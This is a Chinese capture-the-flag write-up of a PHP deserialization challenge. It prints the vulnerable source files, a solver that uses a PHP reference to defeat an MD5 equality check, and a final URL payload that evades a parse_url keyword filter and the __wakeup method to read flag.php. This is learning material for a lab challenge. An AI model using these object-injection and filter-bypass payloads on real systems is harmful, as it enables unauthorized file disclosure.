当时想了大半天,想着到底要怎么绕过MD5呢,结果还是没做出来,即使问了学长,自己还是漏了一个步骤,file=hint.php,特此笔记,又学到了个引用变量的知识
学习自 https://www.ctfwp.com/articals/2019national.html
查看源码
可以知道是php包含的问题,呢么用filter://协议读取下源码(当时保存在编辑器上的源码)
index.php
<html>
<?php
error_reporting(0);
$file = $_GET["file"];
$payload = $_GET["payload"];
if(!isset($file)){
echo 'Missing parameter'.'<br>';
}
if(preg_match("/flag/",$file)){
die('hack attacked!!!');
}
@include($file);
if(isset($payload)){
$url = parse_url($_SERVER['REQUEST_URI']);
parse_str($url['query'],$query);
foreach($query as $value){
if (preg_match("/flag/",$value)) {
die('stop hacking!');
exit();
}
}
$payload = unserialize($payload);
}else{
echo "Missing parameters";
}
?>
<!--Please test index.php?file=xxx.php -->
<!--Please get the source of hint.php-->
</html>
hint.php
<?php
class Handle{
private $handle;
public function __wakeup(){
foreach(get_object_vars($this) as $k => $v) {
$this->$k = null;
}
echo "Waking up\n";
}
public function __construct($handle) {
$this->handle = $handle;
}
public function __destruct(){
$this->handle->getFlag();
}
}
class Flag{
public $file;
public $token;
public $token_flag;
function __construct($file){
$this->file = $file;
$this->token_flag = $this->token = md5(rand(1,10000));
}
public function getFlag(){
$this->token_flag = md5(rand(1,10000));
if($this->token === $this->token_flag)
{
if(isset($this->file)){
echo @highlight_file($this->file,true);
}
}
}
}
?>
这里看到应该是PHP序列化的题目,呢么看一下源码,Handle类有构造函数和析构函数,而析构函数中调用到了Flag类中getFlag()方法。呢么我们可以在new Handle中再new Flag,呢么就会调用Flag的构造函数,并且调用Flag中的getFlag()函数,但是我没想到什么方法能绕过md5完全相等,看了WP后,发现利用引用变量的思想(https://blog.csdn.net/qq_33156633/article/details/79936487)。
简单的意思就是当引用变量时,两个变量指向的是同一地址,$b=&$a的话,就是$b也指向$a的区域,随着$a的变化而变化;
但是再类中,不用加&,类相当就是引用传递.
呢么回到本题目,如果在Flag中的构造函数中加入$this->token = &$this->token_flag的话,不管怎么赋值,他们两个指向的都是同一区域,所以值相等。因此就可以绕过md5了。呢么解题源码如下:
//hint.php
<?php
class Handle{
private $handle;
public function __wakeup(){
foreach(get_object_vars($this) as $k => $v) {
$this->$k = null;
}
echo "Waking up\n";
}
public function __construct($handle) {
$this->handle = $handle;
}
public function __destruct(){
$this->handle->getFlag();
}
}
class Flag{
public $file;
public $token;
public $token_flag;
function __construct($file){
$this->file = $file;
$this->token_flag = $this->token = md5(rand(1,10000));
$this->token = &$this->token_flag;
}
public function getFlag(){
$this->token_flag = md5(rand(1,10000));
if($this->token === $this->token_flag)
{
if(isset($this->file)){
echo @highlight_file($this->file,true);
}
}
}
}
$a = new Flag("flag.php");
$b= new Handle($a);
echo serialize($b);
?>
输出:O:6:"Handle":1:{s:14:"Handlehandle";O:4:"Flag":3:{s:4:"file";s:8:"flag.php";s:5:"token";s:32:"91bc333f6967019ac47b49ca0f2fa757";s:10:"token_flag";R:4;}}
提交的时候还要绕过parse_url (http://www.am0s.com/functions/406.html)和_wakeup魔术方法,成员数目比原先的成员数目大就行
payload: ///?file=hint.php&payload=O:6:"Handle":2:{s:14:"Handlehandle";O:4:"Flag":3:{s:4:"file";s:8:"flag.php";s:5:"token";s:32:"91bc333f6967019ac47b49ca0f2fa757";s:10:"token_flag";R:4;}}
(记得file=hint.php,当时就是忘记了,因为需要包含hint.php,使其执行php文件才行,这是正常的解题思维,然后大佬就是大佬,RCE+条件竞争都能整出来,厉害。最上面的WP收集网站里有讲解)